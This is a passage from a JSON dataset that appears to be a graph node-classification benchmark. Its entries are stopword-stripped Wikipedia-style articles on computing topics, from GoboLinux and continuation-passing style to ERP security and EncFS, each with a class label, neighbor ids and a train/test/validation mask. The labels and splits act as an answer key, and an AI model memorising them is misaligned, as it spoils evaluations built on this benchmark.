      196,
      3269,
      3782,
      8907,
      9424,
      4305,
      2259,
      3795,
      1240,
      8921,
      5339,
      8413,
      9949,
      6367,
      2784,
      3300,
      1255,
      8423,
      236,
      2285,
      8940,
      1776,
      9970,
      5875,
      6391,
      3836,
      2308,
      5892,
      7428,
      2828,
      4364,
      280,
      10009,
      4890,
      10525,
      798,
      4383,
      288,
      2852,
      4901,
      8486,
      10537,
      7983,
      3380,
      11062,
      5431,
      1849,
      2875,
      3900,
      10045,
      7492,
      11590,
      11082,
      332,
      2383,
      3409,
      8019,
      2901,
      5467,
      4957,
      10080,
      3940,
      10599,
      5483,
      2925,
      2420,
      1400,
      7548,
      10109,
      4995,
      9610,
      10129,
      5522,
      1427,
      5524,
      405,
      10645,
      1435,
      5019,
      7579,
      2978,
      10658,
      1959,
      424,
      937,
      5546,
      3499,
      6057,
      7595,
      9163,
      2001,
      3542,
      479,
      10215,
      6632,
      1516,
      5100,
      5613,
      495,
      9712,
      5620,
      11252,
      2045
    ],
    "mask": "None"
  },
  {
    "node_id": 10394,
    "label": 2,
    "text": "GoboLinux:gobolinux gobolinux open source operating system whose prominent feature reorganization traditional linux file system rather following filesystem hierarchy standard like unix-like systems program gobolinux system subdirectory tree files including settings specific program may found thus program foo specific files libraries codice_1 corresponding version program hand example commonly known gcc compiler suite version 8.1.0 would reside directory codice_2 according gobolinux developers results cleaner system gobolinux hierarchy represents radical departure filesystem hierarchy traditionally employed unix-like operating systems specific types files stored together common standard subdirectories codice_3 executables codice_4 configuration files package managers used keep track file belongs program gobolinux files program placed respective program dedicated subdirectory makers gobolinux said filesystem package manager gobolinux package system uses filesystem package database said produce straightforward less cluttered directory tree gobolinux uses symlinks optional kernel module called gobohide achieve maintaining full compatibility traditional linux filesystem hierarchy creators gobolinux stated design modernisms removal distinctions similar traditional directories locations executables codice_3 codice_6 codice_7 gobolinux designers claimed results shell scripts breaking less often linux distributions change introduced gobolinux 2003 adopted distributions much later fedora merged /bin /usr/bin 2012 debian enabled /usr merge default 2016 gobolinux also allows user different versions program installed concurrently even run concurrently furthermore claimed package management index could never become unsynchronized filesystem references nonexistent files simply become broken links thus become inactive gobolinux filesystem changes also allow innovations entirely new boot system use system v bsd style init systems design gobolinux influenced earlier systems nextstep atheos beos adopted original filesystem structures still maintaining considerable degree compatibility unix root gobolinux tree six directories programs users system files mount depot contents described compile program downloads unpacks compiles source code tarballs installs resulting executable code single command codice_25 using simple compilation scripts known recipes compile system somewhat similar gentoo portage system based freebsd ports collection however portage made traditional filesystem hierarchy compatible filesystem hierarchy standard compile extends capability gobolinux distinctive filesystem hierarchy area package management thus gobolinux filesystem serves naturally kind package manager database compile program introduced gobolinux version 011 discussions porting gentoo portage system gobolinux developing port sourceforge.net project name goboportage compile features included gobolinux hierarchy files grouped functional categories index-like structure using symbolic links rooted codice_12 executables accessible codice_27 libraries accessible codice_28 eliminates many traditional distinctions filesystem hierarchy standard distinction made non-essential files stored codice_29 essential emergency files stored directly subdirectories root directory gobolinux developers maintained although distinctions useful longer necessary gobolinux schema symbolic links relating usual unix directories gobolinux tree therefore one find directories codice_4 codice_31 codice_6 expected places symbolic links point functional equivalent codice_12 tree thus traditionally crucial path names codice_34 codice_35 resolved correctly compatibility directories concealed view using custom kernel modification called gobohide implements support hidden files linux used aesthetic reasons thus optional feature gobolinux uses initialization procedure unlike linux distributions use bsd system v procedure codice_36 files command entire boot procedure codice_37 codice_38 run system boot shutdown respectively additionally possible define runlevel scripts specify different ways system may initialized example codice_39 single-user codice_40 multi-user codice_41 boot graphic mode controlled boot loader menu codice_42 file separates site-specific settings rest scripts application-specific tasks found codice_43 called boot scripts releases numbered using octal base system according authors scheme chosen keeps typical leading zero present many free software version numbers since leading zero often indicates number octal play version numbers race happened among linux distributions around 1999 read decimal numbers using octal numbers causes deterministic version bump eight releases version 013 gobolinux made point releases order avoid implication releases stable others tradition broken version 014.01 update 014 focused bug fixes gobolinux currently developed x86-64 officially made i686 release 015 one point incomplete port i386 made ports also made embedded architectures arm superh tasks achieved bootstrap tool developed especially automate making ports lwn.net reviewed gobolinux 010 2004 linux.com wrote review gobolinux 013 jesse smith distrowatch weekly reviewed gobolinux 015 smith also reviewed gobolinux 016",
    "neighbors": [
      4611,
      3079,
      3089,
      4113,
      8209,
      8213,
      8727,
      543,
      11297,
      9762,
      7204,
      9253,
      11305,
      56,
      3129,
      4153,
      59,
      8248,
      9276,
      4673,
      3654,
      5190,
      3147,
      2125,
      1107,
      3667,
      1110,
      89,
      5721,
      4192,
      3685,
      10860,
      5742,
      2671,
      11388,
      7293,
      1150,
      2692,
      8837,
      9353,
      9873,
      11410,
      10900,
      8857,
      6301,
      10397,
      5279,
      673,
      3745,
      1700,
      7332,
      7845,
      4775,
      7847,
      10920,
      9899,
      6828,
      3245,
      7854,
      2738,
      4790,
      4279,
      10425,
      5819,
      190,
      2239,
      9407,
      4298,
      2763,
      8907,
      3791,
      6352,
      6361,
      7385,
      11481,
      2786,
      6371,
      741,
      231,
      4841,
      6890,
      7913,
      5356,
      6380,
      9964,
      7920,
      6898,
      5363,
      9461,
      1782,
      5369,
      6393,
      8957,
      4355,
      4360,
      7435,
      9487,
      2321,
      1298,
      788,
      1813,
      5397,
      4887,
      6934,
      8476,
      8992,
      10530,
      6436,
      2853,
      3369,
      7983,
      823,
      3387,
      7483,
      3903,
      11587,
      2375,
      5959,
      3918,
      5969,
      9048,
      2401,
      2914,
      1379,
      8033,
      5990,
      9063,
      9064,
      7020,
      7534,
      11121,
      9074,
      11648,
      390,
      1416,
      905,
      10127,
      912,
      11669,
      10646,
      926,
      9119,
      1952,
      10149,
      6055,
      7082,
      1455,
      948,
      439,
      10694,
      4039,
      9671,
      5067,
      463,
      975,
      11221,
      9689,
      2010,
      9693,
      485,
      6119,
      10732,
      495,
      8177,
      8180,
      5110,
      11263
    ],
    "mask": "Train"
  },
  {
    "node_id": 10395,
    "label": 9,
    "text": "Continuation-passing_style:continuation-passing style functional programming continuation-passing style cps style programming control passed explicitly form continuation contrasted direct style usual style programming gerald jay sussman guy l. steele jr. coined phrase ai memo 349 1975 sets first version scheme programming language john c. reynolds gives detailed account numerous discoveries continuations function written continuation-passing style takes extra argument explicit continuation i.e function one argument cps function computed result value returns calling continuation function value argument means invoking cps function calling function required supply procedure invoked subroutine return value expressing code form makes number things explicit implicit direct style include procedure returns become apparent calls continuation intermediate values given names order argument evaluation made explicit tail calls simply call procedure continuation unmodified passed caller programs automatically transformed direct style cps functional logic compilers often use cps intermediate representation compiler imperative procedural programming language would use static single assignment form ssa ssa formally equivalent subset cps excluding non-local control flow occur cps used intermediate representation functional compilers also use a-normal form anf languages requiring eager evaluation rather 'thunks described examples cps cps used frequently compilers programmers local global style cps procedure takes extra argument representing done result function calculating along restrictive style prohibiting variety constructs usually available used expose semantics programs making easier analyze style also makes easy express unusual control structures like catch/throw non-local transfers control key cps remember every function takes extra argument continuation b every argument function call must either variable lambda expression complex expression effect turning expressions inside-out innermost parts expression must evaluated first cps explicitizes order evaluation well control flow examples code direct style corresponding cps appear examples written scheme programming language convention continuation function represented parameter named codice_1 note cps versions primitives used like codice_2 codice_3 cps direct style make examples work scheme system would need write cps versions primitives instance codice_3 defined order call procedure written cps procedure written direct style necessary provide continuation receive result computed cps procedure example assuming cps-style primitives provided might call codice_5 variety compilers way primitive functions provided cps used simplest convention however sometimes boolean primitives provided take two thunks called two possible cases codice_6 call inside codice_7 definition would written instead codice_8 similarly sometimes codice_9 primitive included cps instead function codice_10 provided takes three arguments boolean condition two thunks corresponding two arms conditional translations shown show cps global transformation direct-style factorial takes might expected single argument cps factorial takes two argument continuation function calling cps-ed function must either provide new continuation pass calls cps-ed function non-cps function use implicit continuations thus ensure total absence function stack entire program must cps section write function codice_11 calculates hypotenuse using pythagorean theorem traditional implementation codice_11 function looks like transform traditional function cps one need change signature function get another argument function type return type depends function first calculate square codice_13 function pass lambda function continuation accept square first argument reach result calculations get result function pass codice_14 function final argument returns value passed unchanged codice_15 mtl library shipped ghc compiler control.monad.cont module module provides cont type implements monad useful functions following snippet shows codice_13 function using cont type syntax become cleaner type allows us use function codice_17 type codice_18 function one argument function type function argument accepts function discards computations going call example let break execution codice_11 function least one arguments negative returning zero programming continuations also useful caller want wait callee completes example user-interface ui programming routine set dialog box fields pass along continuation function ui framework call returns right away allowing application code continue user interacts dialog box user presses ok button framework calls continuation function updated fields although style coding uses continuations full cps similar idea used function must run different thread different processor framework execute called function worker thread call continuation function original thread worker results java using swing ui framework using java 8 lambda notation code shortens codice_20 keyword might skipped every call cps tail call continuation explicitly passed using cps without tail call optimization tco cause constructed continuation potentially grow recursion also call stack usually undesirable used interesting ways—see chicken scheme compiler cps tco eliminate concept implicit function return combined use eliminate need run-time stack several compilers interpreters functional programming languages use ability novel ways continuation passing style used implement continuations control flow operators functional language feature first-class continuations first-class functions tail-call optimization without tail-call optimization techniques trampolining i.e using loop iteratively invokes thunk-returning functions used without first-class functions even possible convert tail calls gotos loop writing code cps impossible often error-prone various translations usually defined one- two-pass conversions pure lambda calculus convert direct style expressions cps expressions writing trampolined style however extremely difficult used usually target sort transformation compilation functions using one continuation defined capture various control flow paradigms example scheme note cps transform conceptually yoneda embedding also similar embedding lambda calculus π-calculus outside computer science cps general interest alternative conventional method composing simple expressions complex expressions example within linguistic semantics chris barker collaborators suggested specifying denotations sentences using cps might explain certain phenomena natural language mathematics curry–howard isomorphism computer programs mathematical proofs relates continuation-passing style translation variation double-negation embeddings classical logic intuitionistic constructive logic unlike regular double-negation translation maps atomic propositions p p → ⊥ → ⊥ continuation passing style replaces ⊥ type final expression accordingly result obtained passing identity function continuation cps-style expression example classical logic relates manipulating continuation programs directly scheme call-with-current-continuation control operator observation due tim griffin using closely related c control operator",
    "neighbors": [
      2304,
      10246,
      9866,
      8587,
      9749,
      5783,
      1952,
      2595,
      3876,
      5677,
      5040,
      2045,
      8883,
      2105,
      8262,
      1613,
      5837,
      10703,
      10324,
      10581,
      10584,
      8926,
      10083,
      1769,
      5354,
      2557
    ],
    "mask": "None"
  },
  {
    "node_id": 10396,
    "label": 8,
    "text": "WS-MetadataExchange:ws-metadataexchange ws-metadataexchange web services protocol specification published bea systems ibm microsoft sap ws-metadataexchange part ws-federation roadmap designed work conjunction ws-addressing wsdl ws-policy allow retrieval metadata web services endpoint uses soap message request metadata goes beyond basic technique appending wsdl service name url",
    "neighbors": [
      8227,
      10020,
      7878,
      8070,
      6284,
      10829,
      6357,
      5210,
      3323
    ],
    "mask": "Test"
  },
  {
    "node_id": 10397,
    "label": 2,
    "text": "Libranet:libranet libranet operating system based debian gnu/linux last version april 25 2005 released libranet 3.0 cost 90 us dollars new users 65 existing libranet users previous version libranet 2.8.1 became free download development libranet discontinued name comes libra computer systems company owned founder fact libra.com taken first release libranet 1999 linux distributions time difficult install considered either programmers wanted low cost server libranet attempted put sell distribution easy install meant desktop use corel likewise attempted corel linux abandoned refocused software windows mac os x operating systems libranet however continued developed recognition linux distribution good desktop users corel sold rights linux operating system xandros later released offering linux desktop 1999 2003 linux distributions comparable desktop usability libranet also priced similarly began change however 2004 linux whole advanced many distributions reasonably easy install relatively user-friendly desktop distributions mepis competitive far less expensive others knoppix offered cost libranet attempted carve niche user-friendly linux distro extensive support termed running support desktop distros compatible debian release time woody support offered truly extensive jon danzig founder would often personally answer people inquiries helped make people chosen libranet even loyal however release debian sarge 2005 along emergence ubuntu debian based distro offered cost option purchase support libranet received less attention debian revamped installer making easier use good reason use debian-based distribution debian installer user friendly libranet released version 3.0 received good reviews market changed desktop distributions various commercial vendors released free versions distributions suse released opensuse red hat released fedora whereas libranet sold distribution gave free extensive support many distributors chose give away distribution sell support and/or sell proprietary software enhancements jon danzig founder libranet died june 1 2005 son tal taken leadership development team stated would stop maintaining libranet daniel de kok remaining employee went become developer centos many users interested seeing libranet libranet adminmenu software continued available operating system setup configuration tool unique also contained user-friendly kernel compiling tool team including daniel de kok proposed opensource libranet release openlibranet 3.1 failing obtain definitive permission plan tal danzig owner plan dropped",
    "neighbors": [
      2692,
      8837,
      7435,
      6797,
      10127,
      2321,
      5397,
      4887,
      10394,
      673,
      3745,
      10530,
      9253,
      10149,
      11305,
      7854,
      7983,
      2738,
      4790,
      823,
      439,
      56,
      59,
      3903,
      4673,
      2375,
      4039,
      8907,
      3791,
      1110,
      5721,
      9693,
      2914,
      485,
      3685,
      9064,
      4841,
      6890,
      7913,
      7020,
      10860,
      7534,
      2671,
      7920,
      8177,
      9074,
      5363,
      9455,
      9461,
      6393,
      11388,
      8957
    ],
    "mask": "Test"
  },
  {
    "node_id": 10398,
    "label": 4,
    "text": "ERP_security:erp security erp security wide range measures aimed protecting enterprise resource planning erp systems illicit access ensuring accessibility integrity system data erp system computer software serves unify information intended manage company including production supply chain management financial management human resource management customer relationship management enterprise performance management etc common erp systems sap oracle e-business suite microsoft dynamics erp system integrates business processes enabling procurement payment transport human resources management product management financial planning erp system stores confidential information isaca recommends regularly conduct comprehensive assessment erp system security checking erp servers software vulnerabilities configuration errors segregation duties conflicts compliance relevant standards recommendations recommendations vendors erp systems process transactions implement procedures ensure users different access privileges hundreds authorization objects sap permitting users perform actions system case 200 users company approximately 800,000 100*2*20*200 ways customize security settings erp systems growth complexity possibility errors segregation duties conflicts increases vendors fix vulnerabilities regular basis since hackers monitor business applications find exploit security issues sap releases patches monthly patch tuesday oracle issues security fixes every quarter oracle critical patch update business applications becoming exposed internet migrate cloud erp cybersecurity survey revealed organizations running erp systems lack awareness actions taken towards erp security isaca states shortage staff members trained erp security security services superficial understanding risks threats associated erp systems consequently security vulnerabilities complicate undertakings detecting subsequent fixing erp security audit done manually various tools erp packages provide means system security auditing manual auditing complex time-consuming process increases possibility making mistake system includes thousands parameters fine settings including segregation duties transactions tables security parameters set every single system erp system settings customized according customers requirements security issues occur erp systems different levels traffic interception modification 2011 sensepost specialists analyzed diag protocol used sap erp system transferring data client sap server two utilities published allowed intercept decrypt modify client-server requests containing critical information made attacks possible including man-in-the-middle attack second utility operates like proxy created identify new vulnerabilities allowed modifying requests coming client server sap erp system possible perform administering functions via telnet protocol encrypts passwords vulnerabilities encryption authentication protocols vulnerabilities protocols e.g rfc sap erp oracle net oracle e-business suite rfc protocol used remote function call connect two systems tcp/ip sap erp rfc call function enables calling running functional module located system abap language used writing business applications sap functions make rfc calls several critical vulnerabilities found sap rfc library versions 6.x 7.x os software vulnerabilities weak os passwords insecure os settings erp systems transfer functionality web applications level lot vulnerabilities erp systems rbac role-based access control model applied users perform transactions gain access business objects model decision grant access user made based functions users roles roles multitude transactions user group users performs company transaction procedure transforming system data helps perform transaction role number corresponding users one multiple roles roles hierarchical roles implemented system transactions corresponding role rarely change administrator needs add delete users roles administrator provides new user membership one roles employees leave organization administrator removes roles segregation separation duties also known sod concept according user make transaction without users e.g user add new supplier write cheque pay supplier risk fraud much lower sod implemented rbac mechanisms notion mutually exclusive roles introduced instance pay supplier one user initiates payment procedure another accepts case initiating payment accepting mutually exclusive roles segregation duties either static dynamic static sod ssod user belong two mutually exclusive roles dynamic sod dsod user perform within one transaction advantages ssod simple dsod flexible segregation duties explained sod matrix x matrixes describe system roles two roles mutually exclusive flag interception corresponding rows columns erp security scanner software intended search vulnerabilities erp systems scanner analyzes configurations erp system searches misconfigurations access control encryption conflicts insecure components checks updates scanner checks system parameters compliance manufacturer recommendations auditing procedures erp security scanners produce reports vulnerabilities listed according criticality examples scanners",
    "neighbors": [
      2470,
      11112,
      11507,
      5173,
      3414,
      10717,
      4863
    ],
    "mask": "None"
  },
  {
    "node_id": 10399,
    "label": 7,
    "text": "Cannon's_algorithm:cannon algorithm computer science cannon algorithm distributed algorithm matrix multiplication two-dimensional meshes first described 1969 lynn elliot cannon especially suitable computers laid n × n mesh cannon algorithm works well homogeneous 2d grids extending heterogeneous 2d grids shown difficult main advantage algorithm storage requirements remain constant independent number processors scalable universal matrix multiplication algorithm summa practical algorithm requires less workspace overcomes need square 2d grid used scalapack plapack elemental libraries multiplying two n×n matrices b need n ×n processing nodes p arranged 2d grid initially p responsible b need select k every iteration every processor element pe processors n't access data computing formula_1 therefore processors row column must begin summation different indexes example pe 0,0 calculates formula_2 first step pe 0,1 chooses formula_3 first selection k j mod n pe j satisfies constraint first step first step distribute input matrices processors based previous rule next iterations choose new k k 1 mod n every processor way every processor continue accessing different values matrices needed data always neighbour processors pe j needs formula_4 pe j 1 mod n formula_5 pe 1 mod n j next step means formula_4 passed cyclically left also formula_5 cyclically upwards results multiplications summed usual n steps processor calculated formula_1 sum thus searched formula_9 initial distribution processor data next step stored intermediate result previous sum formula_10 formula_11 means three matrices need stored memory evenly distributed across processors practice much fewer processors matrix elements replace matrix elements submatrices every processor processes values scalar multiplication addition become sequential matrix multiplication addition width height submatrices formula_12 runtime algorithm formula_13 formula_14 time initial distribution matrices first step formula_15 calculation intermediate results formula_16 formula_17 stands time takes establish connection transmission byte respectively disadvantage algorithm many connection setups small message sizes would better able transmit data message",
    "neighbors": [
      10734,
      10021,
      7326
    ],
    "mask": "Test"
  },
  {
    "node_id": 10400,
    "label": 9,
    "text": "Dartmouth_ALGOL_30:dartmouth algol 30 dartmouth algol 30 1960s-era implementation firstly algol 58 programming language algol 60 lgp-30 dartmouth college hence name since limited size lgp-30 precluded full implementation algol 60 certain features arrays called value arrays strings variable array bounds recursion omitted implementers include parameters called name using thunks integer labels dubbed work algol 30 since lgp-30 project emerged small group undergraduate students well equipped perform work development computer languages instance one student stephen j. garland discovered compound statements blocks could included samelson bauer scanning algorithm simple fact published years later algol 30 system suffered one defect hindered wide use student-oriented language two-pass system intermediate code similar relocatable binary punched onto paper tape compilations could batched delays presenting source code tape final execution great allow widespread student use clear load-and-go system needed thus born scalp self contained algol processor",
    "neighbors": [
      512,
      8262,
      1610,
      4492,
      9644,
      9804,
      6906
    ],
    "mask": "Validation"
  },
  {
    "node_id": 10401,
    "label": 1,
    "text": "Virtual_Health_Library:virtual health library virtual health library vhl biblioteca virtual en salud bvs institution employs world wide web improve access reliable locally relevant information health health sciences health-professionals researchers academics educators decision makers general public bvses organized auspices pan-american health organization world health organization vhl on-line digital library common space convergence cooperative work producers intermediaries users information healthcare science built developed latin american caribbean center health sciences information also known bireme 1998 vhl promotes development network sources scientific technical information universal access internet bireme envisioned vhl new model management information knowledge includes cooperation convergence institutions systems networks initiatives producers intermediaries users operation networks local national regional international information sources favoring open universal access today every country latin america caribbean regions participates either directly indirectly cooperative products services offered vhl includes 1,000 institutions 30 countries vhl simulated virtual space internet formed collection network health information sources region users different levels locations interact navigate space one many information sources regardless information sources generated updated stored operated internet producers integrators intermediaries decentralized manner following common methodologies integration vhl vhl organizes information structure integrates interconnects literature databases directories experts events institutions catalogue information resources available internet collections full texts highlight scielo scientific electronic library online collection scientific journals selective information dissemination services information sources support education decision-making news discussion lists support virtual communities space vhl therefore dynamic decentralized network information sources based possible retrieve extract information knowledge support health decision-making processes virtual health library visualized distributed base scientific technical health knowledge saved organized stored electronic format countries region universally accessible internet compatible international databases bvs web sites individual countries",
    "neighbors": [
      4984,
      119
    ],
    "mask": "None"
  },
  {
    "node_id": 10402,
    "label": 5,
    "text": "Multicast_Source_Discovery_Protocol:multicast source discovery protocol multicast source discovery protocol msdp protocol independent multicast pim family multicast routing protocol defined experimental rfc 3618 despite becoming ipv4 de facto standard inter-domain multicast development protocol stopped 2006 decided authors proceed making proposed standard msdp interconnects multiple ipv4 pim sparse-mode pim-sm domains enables pim-sm rendezvous point rp redundancy inter-domain multicasting rfc 4611 msdp uses tcp transport protocol multicast tree needs rp rps peers directly msdp peers messages contain sender source address multicast group address g rp domain receives message determines listeners group listeners exist triggers pim join source domain towards data source peering relationship one msdp peer listens new tcp connections well-known port 639 msdp deliberately unspecified ipv6 number reasons including protocols source-specific multicast ssm bi-directional multicast ipv6 embedded rendezvous points would mean less requirement msdp",
    "neighbors": [
      1411,
      9734,
      10924,
      6993,
      5653,
      5469
    ],
    "mask": "None"
  },
  {
    "node_id": 10403,
    "label": 9,
    "text": "SECD_machine:secd machine secd machine highly influential see landin contribution virtual machine abstract machine intended target functional programming language compilers letters stand stack environment control dump internal registers machine registers stack control dump point realisations stacks environment points realisation associative array machine first specifically designed evaluate lambda calculus expressions originally described peter j. landin mechanical evaluation expressions 1964 description published landin fairly abstract left many implementation choices open like operational semantics hence secd machine often presented detailed form peter henderson lispkit lisp compiler distributed since 1980 since used target several experimental compilers 1989 researchers university calgary worked hardware implementation machine d. a. turner 2012 points revised report algol 60 naur 1963 specifies procedure call copying rule avoids variable capture systematic change identifiers method works algol 60 implementation functional programming language functions first-class citizens free variable call stack might dereferenced error turner notes landin solved secd machine function represented closure heap instead evaluation expression begins expression loaded element control codice_1 environment codice_2 stack codice_3 dump codice_4 begin empty evaluation codice_1 converted reverse polish notation rpn codice_6 apply operator example expression codice_7 single list element changed list codice_8 evaluation codice_1 proceeds similarly rpn expressions first item codice_1 value pushed onto stack codice_3 exactly item identifier value pushed onto stack binding identifier current environment codice_2 item abstraction closure constructed preserve bindings free variables codice_2 closure pushed onto stack item codice_6 two values popped stack application done first applied second result application value pushed onto stack application abstraction value however result lambda calculus expression may application rather value pushed onto stack case current contents codice_3 codice_2 codice_1 pushed onto dump codice_4 stack triples codice_3 reinitialised empty codice_1 reinitialised application result codice_2 containing environment free variables expression augmented binding resulted application evaluation proceeds completed evaluation indicated codice_1 empty case result stack codice_3 last saved evaluation state codice_4 popped result completed evaluation pushed onto stack contents restored codice_4 evaluation restored state continues codice_1 codice_4 empty overall evaluation completed result stack codice_3 secd machine stack-based functions take arguments stack arguments built-in instructions encoded immediately instruction stream like internal data-structures stack list codice_3 register pointing list head beginning due list structure stack need continuous block memory stack space available long single free memory cell even cells used garbage collection may yield additional free memory obviously specific implementations secd structure implement stack canonical stack structure improving overall efficiency virtual machine provided strict bound put dimension stack codice_1 register points head code instruction list evaluated instruction executed codice_1 pointed next instruction list—it similar instruction pointer program counter conventional machines except subsequent instructions always specified execution default contained subsequent memory locations case conventional machines current variable environment managed codice_2 register points list lists individual list represents one environment level parameters current function head list variables free current function bound surrounding function elements codice_2 dump whose head codice_4 register points used temporary storage values registers example function calls likened return stack machines memory organization secd machine similar model used functional language interpreters number memory cells hold either atom simple value example 13 represent empty non-empty list latter case cell holds two pointers cells one representing first element representing list except first element two pointers traditionally named car cdr respectively—but modern terms head tail often used instead different types values cell hold distinguished tag often different types atoms integers strings etc distinguished well list holding numbers 1 2 3 usually written codice_35 might represented follows memory cells 3 5 belong list cells distributed randomly memory cell 2 head list points cell 1 holds first element value list containing 2 3 beginning cell 6 cell 6 points cell holding 2 cell 7 represents list containing 3 pointing cell 8 containing value 3 pointing empty list nil cdr secd machine cell 0 always implicitly represents empty list special tag value needed signal empty list everything needing simply point cell 0 principle cdr list cell must point another list convention car cdr point atoms yield pair usually written like codice_36 number additional instructions basic functions like car cdr list construction integer addition i/o etc exist take necessary parameters stack",
    "neighbors": [
      2304,
      2881,
      2595,
      1124,
      6821,
      7395,
      3370,
      9739,
      2381,
      5585,
      1333,
      10581,
      5501,
      1947,
      5342,
      1982
    ],
    "mask": "Validation"
  },
  {
    "node_id": 10404,
    "label": 1,
    "text": "Canadian_Police_Information_Centre:canadian police information centre canadian police information centre cpic cipc central police database canada law enforcement agencies access information number matters canada national law enforcement networking computer system ensuring officers across country access information approximately 3 million files generated year responsibility originating agency ensure data integrity file cpic approved use treasury board canada became operational 1972 maintained royal canadian mounted police rcmp central registry located rcmp headquarters ottawa ontario canada cpic interfaced united states national crime information center national law enforcement telecommunications system information shared example wandering persons registry information shared across border order government agency access cpic must agree abide rules set cpic reference manual approved cpic advisory committee composed 26 senior police officers municipal provincial police forces ontario police commission rcmp non-policing agencies must also enter memorandum understanding rcmp may audited time time compliance cpic broken four data banks investigative identification intelligence ancillary contain information local municipal provincial police services canada well federal law enforcement agencies canada border services agency military police maintain local records addition cpic records local records maintained contact police variety reasons may may contain information would entered cpic system cpic agencies subject audit 4-year cycle records added cpic system must satisfy stringent entry criteria every record must valid accurate complete nature compliant input rules province british columbia mandated law police forces share platform known prime-bc ontario local records kept systems known either niche versadex depending municipalities choice implementation quebec system used called crpq centre de reseignement des policiers du québec rcmp runs similar system called pros police reporting occurrence system provinces providing contract policing well federal policing 2011 toronto-based psychiatric patient advocate office announced received numerous complaints people denied entry united states names american department homeland security watchlist names provided canadian police information centre available american law enforcement authorities according wikileaks",
    "neighbors": [
      2901
    ],
    "mask": "Test"
  },
  {
    "node_id": 10405,
    "label": 6,
    "text": "EncFS:encfs encfs free lgpl fuse-based cryptographic filesystem transparently encrypts files using arbitrary directory storage encrypted files two directories involved mounting encfs filesystem source directory mountpoint file mountpoint specific file source directory corresponds file mountpoint provides unencrypted view one source directory filenames encrypted source directory files encrypted using volume key stored either within outside encrypted source directory password used decrypt key encfs offers several advantages disk encryption software simply file stored individually encrypted file elsewhere host directory tree encfs available multiple platforms whereas ecryptfs tied linux kernel encfs implements bitrot detection top underlying filesystem encfs volumes occupy fixed size — encrypted directories grow shrink files added removed mountpoint encfs encrypted directory located normal file server via nfs sshfs etc mirrored backed efficiently normal file-system tools rsync possible directories mountpoint exist different physical devices filesystem mounted one sub-directories source directory backup utilities back files changed source directory file synchronisation cloud storage corruption data isolated corruption filedata local single file data corruption filesystem corrected reliable filesystem repair utility like fsck whole-disk encryption systems lack one attributes since file modifications shine underlying file system various optimizations operating system still possible unlike full-disk encryption example passing information released space trim improve performance ssd drives also supported dm-crypt files accessed random example skip middle large encrypted video without decrypting whole file drawbacks using encfs mounted encfs directories share features restrictions filesystem containing source directory due encryption filenames encrypted files produced encfs longer original filenames therefore filenames whose length close maximum supported filesystem stored encfs since exceed length limit encryption filesystems limit filenames 255 bytes case encfs supports filenames 190 bytes anyone access source directory able see many files encrypted filesystem permissions approximate size last time accessed modified though file names file data encrypted paid security audit conducted february 2014 revealed several potential vulnerabilities concludes announcement encfs 1.8 included several underlying design changes acknowledging security concerns raised previous audit however certain concerns still remain regarding vulnerabilities creating new encfs volume several different options available customize filesystem suit various needs encfs uses whatever ciphers able locate various encryption libraries system blowfish aes typically available cipher key length keysize selected ciphers support variable key lengths file encrypted blocks option controls size blocks time single byte read entire block contained must decrypted likewise write block must decrypted altered re-encrypted default block size 1024 sufficient purposes filenames source directory plain encrypted block stream mode block mode obscures filename length somewhat stream mode keeps short possible might save space source directory filesystem depending filesystem manages directory tree enabled initialization vector filename encryption derived file parent directories causing two files name — different directories — different encrypted filenames directory renamed files directories contained therein need encrypted filenames re-encrypted expensive operation option disabled heavily populated directories renamed often enabled file encrypted random 8-byte initialization vector stored within encrypted file source directory option disabled file encrypted initialization vector make volume key easier break enabling option makes filesystem secure cost additional 8 bytes per file causes file data initialization vector derived filename initialization vector chain data encrypted differently given different filename directory consequently renaming file mode enabled requires either file random initialization vector offset change filename initialization vector chain data re-encoded authors encfs chosen former route considerably faster especially large files makes encoding depend full pathname renaming moving means reencoding hardlinks supported stores checksum encrypted block causing corruption modification encrypted files detected encfs checksum blockmacbytes 8 bytes optionally 8 additional bytes random data blockmacrandbytes added block prevent two blocks unencrypted data checksum option creates large amount cpu overhead block checksum must calculated data read verify integrity written update checksum encfs supports somewhat primitive form secondary volumes single source directory offering different files given different passwords encfs unable decrypt file volume key ignored encfs forced ignore invalid password entry volume key decode differently hence files encrypted decrypted different key present two different encrypted volumes given different passwords however possible two filenames two different secondary volumes encrypted filename case file overwritten new file created note refers encrypted filenames unencrypted filenames danger averted creating one directory per secondary volume storing files visible directory secondary volume mounted also password changed volume key re-encoded new password cause secondary filesystems vanish volume key longer incorrectly decode key given secondary password primary password changed back secondary filesystems become available encfs author support technique",
    "neighbors": [
      5120,
      2050,
      2564,
      6669,
      3598,
      4623,
      10257,
      9236,
      6677,
      5142,
      8214,
      3611,
      9249,
      9762,
      5158,
      3629,
      7225,
      11323,
      9281,
      8772,
      7244,
      1109,
      8283,
      4708,
      9836,
      7789,
      7794,
      5749,
      9333,
      6263,
      9335,
      9343,
      6280,
      4746,
      7818,
      8331,
      654,
      2193,
      2194,
      2197,
      2199,
      11419,
      6309,
      1190,
      5286,
      5293,
      7344,
      2230,
      5816,
      1212,
      8380,
      3265,
      10951,
      9420,
      7378,
      3795,
      4819,
      8402,
      8404,
      728,
      8410,
      6365,
      739,
      7907,
      8938,
      1263,
      1776,
      3312,
      3826,
      2291,
      246,
      3834,
      8446,
      3328,
      11012,
      2314,
      8461,
      6416,
      1810,
      6935,
      11033,
      287,
      1825,
      6434,
      5413,
      3368,
      4907,
      9004,
      302,
      7983,
      11568,
      6961,
      6963,
      1844,
      3382,
      823,
      6970,
      11072,
      3909,
      2378,
      4431,
      5969,
      346,
      2395,
      2397,
      10596,
      2407,
      10087,
      5482,
      11638,
      6519,
      376,
      11128,
      890,
      7554,
      10631,
      8075,
      7565,
      6545,
      5013,
      11675,
      11676,
      414,
      2974,
      7070,
      10151,
      4012,
      1454,
      6062,
      8114,
      7603,
      8631,
      1464,
      1978,
      8640,
      8643,
      11221,
      7126,
      2015,
      7139,
      1509,
      9189,
      7663,
      5106,
      3572,
      11256,
      2555,
      3582
    ],
    "mask": "Validation"
  },
  {
    "node_id": 10406,
    "label": 2,
